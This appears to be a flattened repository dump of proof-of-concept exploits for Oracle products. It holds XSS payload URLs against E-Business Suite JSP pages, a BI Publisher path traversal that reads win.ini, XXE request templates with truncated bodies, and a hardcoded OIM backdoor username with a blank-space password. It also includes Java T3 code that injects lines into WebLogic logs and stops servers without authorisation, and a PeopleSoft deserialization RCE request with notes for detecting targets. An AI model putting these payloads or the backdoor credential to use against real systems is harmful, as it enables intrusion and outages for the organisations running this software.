├── Oracle Business Intelligence
│   ├── readme.md
│   ├── CVE-2019-2588 traversal
│   │   └── PoC_URL.txt
│   └── XXE
│       └── CVE-2019-2616_PoC.txt
├── README.md
├── CVE-2017-10410
│   └── README.md
├── CVE-2017-10413
│   └── README.md
├── CVE-2017-10411
│   └── README.md
├── CVE-2017-10415
│   └── README.md
├── CVE-2017-10151
│   └── README.md
├── CVE-2017-10417
│   └── README.md
├── CVE-2017-10409
│   └── README.md
├── CVE-2017-10412
│   └── README.md
├── CVE-2017-10416
│   └── README.md
├── Oracle AutoVue 3D Professional Advanced 21.0.1.0.0
│   ├── PoC.txt
│   └── vuln_code.txt
├── CVE-2017-10148
│   └── README.md
├── CVE-2017-10414
│   └── README.md
├── CVE-2017-10366
│   └── README.md
└── CVE-2017-10147
    └── README.md

/Oracle Business Intelligence/readme.md:
--------------------------------------------------------------------------------
inurl:/xmlpserver/

/README.md:
--------------------------------------------------------------------------------
# OracleCVE
Vulnerabilities found in Oracle products

/CVE-2017-10410/README.md:
--------------------------------------------------------------------------------
```
http://ebs.example.com:8000/OA_HTML/cskmrelstmts.jsp?nStartingPage=1314482';}//
```

/CVE-2017-10413/README.md:
--------------------------------------------------------------------------------
```
http://ebs.example.com:8000/OA_HTML/csm5Sync.jsp?devtype=13&queryId=13muh1r%3cscript%3ealert(1)%3c%2fscript%3er5z89&log=13
```

/CVE-2017-10411/README.md:
--------------------------------------------------------------------------------
```
http://ebs.example.com:8000/OA_HTML/cskmslctcat.jsp?h_CatSelectionCallerPage=1314482%27;}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//
```

/CVE-2017-10415/README.md:
--------------------------------------------------------------------------------
```
http://ebs.example.com:8000/OA_HTML/ibutpqs.jsp?fromSource=13&oldTemplateName=13&opcode=13&TemplateID=1310811'}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//2f105
```

/Oracle Business Intelligence/CVE-2019-2588 traversal/PoC_URL.txt:
--------------------------------------------------------------------------------
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

/CVE-2017-10151/README.md:
--------------------------------------------------------------------------------
The backdoor is created using this Java code:
![alt text](https://pbs.twimg.com/media/DNdwkClXkAM30xz.jpg:large "CVE-2017-10151")
username: OIMINTERNAL
password: %single space character%

https://docs.oracle.com/cd/E40329_01/admin.1112/e27149/appdefaultusr.htm#OMADM5326

/CVE-2017-10417/README.md:
--------------------------------------------------------------------------------
PoC 1
```
http://ebs.example.com:8000/OA_HTML/ieccaleexception.jsp?sAsc=py6zg%22%3ew786z&send=13&action=13&calendarName=13&calendarId=13&orderBy=13&next=13
```

PoC 2
```
http://ebs.example.com:8000/OA_HTML/ieccaleexception.jsp?sAsc=13&send=vk660%22%3eufnwz&action=13&calendarName=13&calendarId=13&orderBy=13&next=13
```

/CVE-2017-10409/README.md:
--------------------------------------------------------------------------------
```
http://ebs.example.com:8000/OA_HTML/ibeCZzpEntry.jsp?go=aaa%2520onmouseover%253dalert%25281%2529 aaa&forceReg=t&checkAcct=f&enrolled=t&ref=http%3A%2F%2Febs.example.com%3A8000%2FOA_HTML%2FcsdInstSiteLOV.jsp%3FCriteria%3D13%26Criteria%3D13&jttst0=0_21841%2C21841%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG8440C656F895487CD85873E261712B6BB2883DA0C57D4B7904EBC089796653C3D39162564DF461ADD3F0DB479A8A28E5C6&oas=jzTGKVnESVZI-4sz82rD-g..
```

/Oracle Business Intelligence/XXE/CVE-2019-2616_PoC.txt:
--------------------------------------------------------------------------------
```
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 76
Content-Type: text/xml; charset=UTF-8


```

/CVE-2017-10412/README.md:
--------------------------------------------------------------------------------
PoC 1
```
http://ebs.example.com:8000/OA_HTML/cskmslctplat.jsp?h_PlatSelectionCallerPage=13&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13egnhp-->xz8gv&firstRequest=13
```

PoC 2
```
http://ebs.example.com:8000/OA_HTML/cskmslctplat.jsp?h_PlatSelectionCallerPage=1352327%22}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//56&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13&firstRequest=13
```

PoC 3
```
http://ebs.example.com:8000/OA_HTML/cskmslctprod.jsp?h_ProdSelectionCallerPage=1356726%22}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13&firstRequest=13
```

/CVE-2017-10416/README.md:
--------------------------------------------------------------------------------
PoC 1
```
http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=13&send=13&action=13&calendarName=13&calendarId=13&orderBy=repmc%22%3ezmpbn&next=13
```

PoC 2
```
http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=inczy%22%3edz62n&send=13&action=13&calendarName=13&calendarId=13&orderBy=13&next=13
```

/Oracle AutoVue 3D Professional Advanced 21.0.1.0.0/PoC.txt:
--------------------------------------------------------------------------------
POST /soap/servlet/rpcrouter HTTP/1.1
Host: 192.168.138.133:8443
Cache-Control: max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 651

]>
&xxe;

/Oracle AutoVue 3D Professional Advanced 21.0.1.0.0/vuln_code.txt:
--------------------------------------------------------------------------------
public void doPost(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse)
    throws ServletException, IOException
**************
    localSOAPContext1.setProperty(Constants.BAG_HTTPSESSION, localHttpSession);
    localSOAPContext1.setProperty(Constants.BAG_HTTPSERVLETREQUEST, paramHttpServletRequest);
    localSOAPContext1.setProperty(Constants.BAG_HTTPSERVLETRESPONSE, paramHttpServletResponse);

    // The request body is parsed with the default document builder configuration
    DocumentBuilder localDocumentBuilder = XMLParserUtils.getXMLDocBuilder();

    localEnvelope1 =
        ServerHTTPUtils.readEnvelopeFromRequest(localDocumentBuilder,
                                                paramHttpServletRequest.getContentType(),
                                                paramHttpServletRequest.getContentLength(),
                                                paramHttpServletRequest.getInputStream(),
                                                this.editor,
                                                paramHttpServletResponse,
                                                localSOAPContext1);

/CVE-2017-10148/README.md:
--------------------------------------------------------------------------------
PoC
```
static boolean anon_log_injection(String PS_SERVER_IP, String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic.common.T3Services");
    Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
    T3ServicesDef h = (T3ServicesDef) o;
    // Each message carries an embedded line break, which ends up as a separate log line
    h.log().log("ERPScan_1\n\rERPScan_2");
    h.log().info("ERPScan_3\n\rERPScan_4");
    h.log().error("ERPScan_5\n\rERPScan_6");
    h.log().warning("ERPScan_7\n\rERPScan_8");
    h.log().debug("ERPScan_9\n\rERPScan_10");
    return false;
}
```
[Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/

/CVE-2017-10414/README.md:
--------------------------------------------------------------------------------
PoC 1
```
http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13yfb22%22%3ej00i8&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13
```

PoC 2
```
http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13sttk1%22%3egjf4h&refUrl=13
```

PoC 3
```
http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13lb6j2%22%3er9uz6&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13
```

PoC 4
```
http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13t1kal%22%3eip0ho&soldtoCustAccountId=13&cartId=13&refUrl=13
```

PoC 5
```
http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13g72w9%22%3eqb3m3&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13
```

/CVE-2017-10366/README.md:
--------------------------------------------------------------------------------
The RCE vulnerability is present in the monitor service of PeopleSoft 8.54, 8.55 and 8.56.
```
POST /monitor/%SITE_NAME% HTTP/1.1
Host: PeopleSoft:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie:a=aa

§JAVA_SERIAL§
```
%SITE_NAME% is the PeopleSoft site "name"; to obtain it you can use some information disclosure or brute force.

Information for automated detection:

1. If the monitor component is deployed and you don't know %SITE_NAME%, you will get this type of error:
```
Site name is not valid. Check your URL syntax and try again.
```

2. If %SITE_NAME% is valid, you will get this message:
```
PeopleSoft

Ping Test for Monitor Servlet

Ping successful. Site %SITE_NAME% is valid.
```

3. If the monitor is not deployed, you will get this message:
```
Error 404--Not Found

From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:

10.4.5 404 Not Found

The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent.

If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address.
```

/CVE-2017-10147/README.md:
--------------------------------------------------------------------------------
Vulnerable code
```
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
    // No authorization check is performed before the server is stopped and restarted
    ServerMigrationTask task = this.taskMap.get(serverName);
    if (task == null) {
        task = new ServerMigrationTask(serverName, destinationMachine);
        if (MigrationDebugLogger.isDebugEnabled()) {
            MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
        }
        this.taskMap.put(serverName, task);
        try {
            this.stopServer(sourceDown, task);
            this.startServer(destinationDown, task);
        }
        finally {
            this.taskMap.remove(serverName);
        }
        return;
    }
    throw new ServerMigrationException("Migration operation in progress", null);
}
```
PoC

```
static boolean PoC(String PS_SERVER_IP, String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
    Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
    ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
    h.migrate("PIA", "а", "any_data_or_ip", true, true);
    return false;
}
```
[Reference] https://erpscan.com/advisories/erpscan-17-041-unauthorized-container-shutdown-servermigrationcoordinator/
--------------------------------------------------------------------------------